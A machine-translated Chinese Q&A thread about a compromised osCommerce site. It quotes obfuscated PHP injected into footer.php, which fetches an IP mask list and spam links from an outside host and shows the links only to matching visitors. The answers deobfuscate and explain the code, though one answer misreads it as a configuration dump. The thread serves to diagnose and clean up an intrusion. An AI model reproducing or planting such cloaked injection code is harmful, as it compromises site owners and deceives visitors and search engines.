此代码是否被利用?这是什么代码?

如何解决此代码是否被利用?这是什么代码?

| 我正在寻找一个被某人/某物利用的网站。该网站的页脚中已经插入了许多链接,这些链接都链接到药物宣传,还有谁知道呢。页脚顶部有很多链接。我现在只能在Yahoo索引中的缓存页面上找到它们。 Google对该网站仍然不满意,并且该实时网站不再显示任何链接。这是给客户的..所以我大多数时候都知道我被告知的内容,以及其他可以发现的内容。 我在footer.php的\“ tip / top \”(这是一个OsCommerse网站)的\“ tip / top \”中找到了以下代码:
<?php $x13=\"cou\\156\\x74\"; $x14=\"\\x65\\x72\\162\\x6fr\\x5f\\x72ep\\157\\162\\164ing\"; $x15=\"\\146\\151l\\x65\"; $x16=\"\\146i\\154\\145_g\\x65t\\x5f\\x63\\x6fn\\164\\145n\\164s\"; $x17=\"\\163\\x74rle\\156\"; $x18=\"\\163tr\\160o\\x73\"; $x19=\"su\\x62\\x73\\164\\162\"; $x1a=\"tr\\151m\"; 
ini_set(\' display_errors\',\'off\');$x14(0);$x0b = \"\\150t\\x74p\\x3a\\057\\057\\x67\\145n\\x73h\\157\\x70\\056org/\\163\\x63\\162ipt\\057\\155a\\163k\\x2e\\x74x\\x74\";$x0c = $x0b; $x0d = $_SERVER[\"\\x52E\\115O\\124\\105_A\\104\\104\\122\"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != \"\" ){ if ( ($x11 = $x18($x10,\"*\")) !== false ) $x10 = $x19($x10,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d,$x10) === 0 ) { $x12 =$x16(\"\\150\\164\\164\\160\\x3a/\\057g\\145\\x6e\\x73\\x68o\\160\\056o\\162\\x67\\057\\160aral\\x69\\x6e\\x6b\\x73\\x2f\\156e\\167\\x2f3\\057\\x66\\145e\\144\\x72\\157lle\\x72\\x2e\\143\\x6f\\x6d\\x2e\\x74\\170\\x74\"); echo \"$x12\"; } }}echo \"\\x3c\\041\\055\\x2d \\060\\x36\\071\\x63\\x35b4\\x66e5\\060\\062\\067\\146\\x39\\x62\\0637\\x64\\x653\\x31d2be5\\145\\141\\143\\066\\x37\\040\\x2d-\\076\";?>
当我查看具有\'Bad \'链接的源缓存页面时,此代码正好适合在footer.php源代码中找到它的位置。 Google的一项小研究表明,有类似代码的漏洞利用。 您怎么看,当我在自己的服务器上运行它时,我得到的只是源代码中的回显注释,如下所示:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
我不想仅仅因为它看起来很糟糕而匆忙删除代码并说“你的好”,尤其是因为我没有立即知道“坏链接”已经消失的方法。顺便说一句,所有链接都转到无效的URL。 您会看到仍然在Yahoo中缓存的不良页面: http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/ cache.aspx?q = http%3a%2f%2fwww.feedroller.com%2f + medicine&d = 4746458759365253&mkt = zh-CN&setlang = zh-CN&w = b97b0175,d5f14ae5&icp = 1&.intl = us&sig = Ifqk1OuvHXNcZnAg--     

解决方法

        这是清晰的脚本(或多或少) 只是将该网址的内容转储到您的页面上 它还会根据IP列表(google等)检查remote_addr,以使其保持未被检测到的状态。 看起来您被genshop.com迷住了
<?php

 $count=\"cou\\156\\x74\"; // count 
 $error_reporting=\"\\x65\\x72\\162\\x6fr\\x5f\\x72ep\\157\\162\\164ing\"; // error_reporting
 $file=\"\\146\\151l\\x65\"; // file
 $file_get_contents=\"\\146i\\154\\145_g\\x65t\\x5f\\x63\\x6fn\\164\\145n\\164s\"; // file_get_contents
 $strlen=\"\\163\\x74rle\\156\"; // strlen
 $strpos=\"\\163tr\\160o\\x73\"; // strpos
 $substr=\"su\\x62\\x73\\164\\162\"; // substr
 $trim=\"tr\\151m\"; //trim

ini_set(\' display_errors\',\'off\');
$error_reporting(0);

$x0b = \"http://genshop.org/scripts/mask.txt\";
$url = $x0b;
$tmp = \"REMOTE_ADDR\";
$x0d = $_SERVER[$tmp];
$tmp_filename = \"http://genshop.org/paralinks/new/3/feedroller.com.txt\";

$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
    $curr_ip = $trim($ips[$i]);
        if ( $curr_ip != \"\" ) {
            if ( ($x11 = $strpos($curr_ip,\"*\")) !== false )
                $curr_ip = $substr($curr_ip,$x11);

            // check visitor ip against mask list
            if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d,$curr_ip) === 0 ) {
                $x12 = $file_get_content($tmp_filename);
                echo \"$x12\";
                // print spam contents
            }
        }
    }
echo $curr_ip;
}

$tmp2 = \"\\x3c\\041\\055\\x2d \\060\\x36\\071\\x63\\x35b4\\x66e5\\060\\062\\067\\146\\x39\\x62\\0637\\x64\\x653\\x31d2be5\\145\\141\\143\\066\\x37\\040\\x2d-\\076\";
echo $tmp2;
?>
    ,        似乎引用/加载了两个URL: http://genshop.org/script/mask.txt http://genshop.org/paralinks/new/3/feedroller.com.txt 它只是垃圾邮件分发脚本。 对于部分混淆,请使用:
print preg_replace(\'#\"[^\"]+\\\\\\\\\\w+\"#e\',\"stripcslashes(\'$0\')\",$source);
    ,        这实际上是一种转储有关正在运行的配置的信息的尝试。立即将其删除。 它的工作方式非常复杂,超出了我的范围,但这是黑客入侵您的网站的第一步。     

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


依赖报错 idea导入项目后依赖报错,解决方案:https://blog.csdn.net/weixin_42420249/article/details/81191861 依赖版本报错:更换其他版本 无法下载依赖可参考:https://blog.csdn.net/weixin_42628809/a
错误1:代码生成器依赖和mybatis依赖冲突 启动项目时报错如下 2021-12-03 13:33:33.927 ERROR 7228 [ main] o.s.b.d.LoggingFailureAnalysisReporter : *************************** APPL
错误1:gradle项目控制台输出为乱码 # 解决方案:https://blog.csdn.net/weixin_43501566/article/details/112482302 # 在gradle-wrapper.properties 添加以下内容 org.gradle.jvmargs=-Df
错误还原:在查询的过程中,传入的workType为0时,该条件不起作用 &lt;select id=&quot;xxx&quot;&gt; SELECT di.id, di.name, di.work_type, di.updated... &lt;where&gt; &lt;if test=&qu
报错如下,gcc版本太低 ^ server.c:5346:31: 错误:‘struct redisServer’没有名为‘server_cpulist’的成员 redisSetCpuAffinity(server.server_cpulist); ^ server.c: 在函数‘hasActiveC
解决方案1 1、改项目中.idea/workspace.xml配置文件,增加dynamic.classpath参数 2、搜索PropertiesComponent,添加如下 &lt;property name=&quot;dynamic.classpath&quot; value=&quot;tru
删除根组件app.vue中的默认代码后报错:Module Error (from ./node_modules/eslint-loader/index.js): 解决方案:关闭ESlint代码检测,在项目根目录创建vue.config.js,在文件中添加 module.exports = { lin
查看spark默认的python版本 [root@master day27]# pyspark /home/software/spark-2.3.4-bin-hadoop2.7/conf/spark-env.sh: line 2: /usr/local/hadoop/bin/hadoop: No s
使用本地python环境可以成功执行 import pandas as pd import matplotlib.pyplot as plt # 设置字体 plt.rcParams[&#39;font.sans-serif&#39;] = [&#39;SimHei&#39;] # 能正确显示负号 p
错误1:Request method ‘DELETE‘ not supported 错误还原:controller层有一个接口,访问该接口时报错:Request method ‘DELETE‘ not supported 错误原因:没有接收到前端传入的参数,修改为如下 参考 错误2:cannot r
错误1:启动docker镜像时报错:Error response from daemon: driver failed programming external connectivity on endpoint quirky_allen 解决方法:重启docker -&gt; systemctl r
错误1:private field ‘xxx‘ is never assigned 按Altʾnter快捷键,选择第2项 参考:https://blog.csdn.net/shi_hong_fei_hei/article/details/88814070 错误2:启动时报错,不能找到主启动类 #
报错如下,通过源不能下载,最后警告pip需升级版本 Requirement already satisfied: pip in c:\users\ychen\appdata\local\programs\python\python310\lib\site-packages (22.0.4) Coll
错误1:maven打包报错 错误还原:使用maven打包项目时报错如下 [ERROR] Failed to execute goal org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources (default-resources)
错误1:服务调用时报错 服务消费者模块assess通过openFeign调用服务提供者模块hires 如下为服务提供者模块hires的控制层接口 @RestController @RequestMapping(&quot;/hires&quot;) public class FeignControl
错误1:运行项目后报如下错误 解决方案 报错2:Failed to execute goal org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile (default-compile) on project sb 解决方案:在pom.
参考 错误原因 过滤器或拦截器在生效时,redisTemplate还没有注入 解决方案:在注入容器时就生效 @Component //项目运行时就注入Spring容器 public class RedisBean { @Resource private RedisTemplate&lt;String
使用vite构建项目报错 C:\Users\ychen\work&gt;npm init @vitejs/app @vitejs/create-app is deprecated, use npm init vite instead C:\Users\ychen\AppData\Local\npm-